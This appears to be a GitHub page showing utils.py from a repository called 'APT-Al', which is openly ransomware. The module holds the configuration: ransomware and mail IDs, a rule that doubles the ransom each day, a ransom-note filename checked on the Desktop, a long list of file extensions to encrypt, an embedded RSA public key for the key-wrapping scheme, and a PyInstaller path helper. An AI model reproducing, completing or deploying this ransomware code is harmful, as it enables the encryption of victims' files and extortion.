apt-al/utils.py at main · APT-Al/apt-al · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import os
import sys
from datetime import datetime

who_we_are = "APT-Al"
version = "2" # XXXX

what_is_my_name = "XXXX" # to copy startup programs
what_is_my_id = "1" # ransomwareID XXXX
what_is_my_mail_id = "3" # mail ID XXXX
when_did_i_work = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
how_many_days_to_double_ransom = 1

# the beginning point of recon
root_directory = os.path.expanduser('~')
desktop_directory = os.path.join(root_directory,"Desktop")
root_directory = os.path.join(root_directory,"test")

# if this file have been created, we're going to create a new one not to ruin old keys
aesIV_file_store_name = "HEYY_APTAl_READ_ME.txt"
_len_aesIV_file_store_name = len(aesIV_file_store_name)
_count_of_file = 0
for name in os.listdir(desktop_directory):
    if name[-_len_aesIV_file_store_name:] == aesIV_file_store_name:
        _count_of_file += 1
# where to write the pairs made up of a file and AES IV
aesIV_file_store_path = os.path.join(desktop_directory,str(_count_of_file)+aesIV_file_store_name)

# the extensions are ordered so we can use binary search
file_extentions = [ '7z', 'ai', 'aif', 'apk', 'arj', 'asp', 'aspx', 'avi',
                    'bak', 'bat', 'bin', 'bmp', 'c', 'cab', 'cda', 'cfg',
                    'cgi', 'class', 'cpp', 'cs', 'css', 'csv', 'dat', 'db',
                    'dbf', 'deb', 'dmg', 'doc', 'docx', 'eml', 'fnt',
                    'fon', 'htm', 'html', 'ico', 'iso', 'jar', 'java', 'jpeg',
                    'jpg', 'js', 'json', 'jsp', 'key', 'log', 'mdb', 'mid', 'midi',
                    'mov', 'mp3', 'mp4', 'mpa', 'mpg', 'msg', 'msi', 'odp',
                    'ods', 'oft', 'ogg', 'ost', 'pdf', 'php', 'pkg', 'pl',
                    'png', 'pps', 'ppt', 'pptx', 'py', 'rar', 'rpm', 'rss',
                    'rtf', 'sh', 'sql', 'svg', 'swift', 'sys', 'tar', 'tif',
                    'tiff', 'toast', 'txt','vb', 'wav', 'wma', 'wpl', 'wsf',
                    'xhtml', 'xls', 'xml', 'xslm', 'xslx', 'zip']
# exe deleted

aes_IV_key_length = 16
rsa_public_key = "-----BEGIN RSA PUBLIC KEY-----\n\
MIICCgKCAgEAu25ITaLSaYnlJ88w8nWdoJF/q4nrtqH9Iajw1CWlEiSTlUqMy0x+\n\
3uDC29Afv246gSad+fXvS0V22mhnv9ByVk8mTBQCCx7ytR0wLGGSkYl1eSsPAmvV\n\
g59onZgM/aF0vr4MCmYZLqXOabWF6/a8/+qW/v2vA3DJ6ur4N3GEAC26c40YoXqU\n\
nt3Eazzfe5rXMrXPokxaBqfQfzCPVAwwWuTL4VDQINm47cLK4c5RmagQXm3ZvqBg\n\
8j2RMAKZ7xvzw9OCacTEahypcMyyobWSiAsrhNHBl3GsKAne/91LYDmWJUa5tg7q\n\
FBT2M1RvNGezBdV0jDWbUy4KFBS2pr02PWhACLGXZzqAI2isq6fjCJv8tQB7+MWx\n\
fncrreeNQGJ9JqErAZ7IlwlW+NAbn/RQ4OuRLGCIL2IDTkeBN9GKiIqvxOkvtvjR\n\
QKpPHa5tDgMWgmYTsIZrPFUCjbBslQQuYMPLx66rBAr7bNEJZoG4xaAsWHBbvj2r\n\
b4DvLhmsrITAppF9TATh1amnze+Gbupxm68hn+XTecyWFsXz7kIfsycT/OmwW2vm\n\
hjPH7H5Q4TqpxEkDDc3thRcr47wZtiYGeanc/UOsNabxyTahKGPFYooVHaoj9pl5\n\
s+osKiL/Se+8eKHxt9JgP1tUXYMZbfNoo0q0QkIfl3Q8Js+lsOqVP+cCAwEAAQ==\n\
-----END RSA PUBLIC KEY-----" # XXXX


############# COMMON FUNCTIONS ################

def resourcePath(filename, folders=""):
    """ Get absolute path to resource, works for dev and for PyInstaller """
    try:
        # PyInstaller creates a temp folder and stores path in _MEIPASS
        base_path = sys._MEIPASS
    except Exception:
        base_path = os.path.abspath(".")

    for fol in folders:
        base_path = os.path.join(base_path,fol)

    return os.path.join(base_path, filename)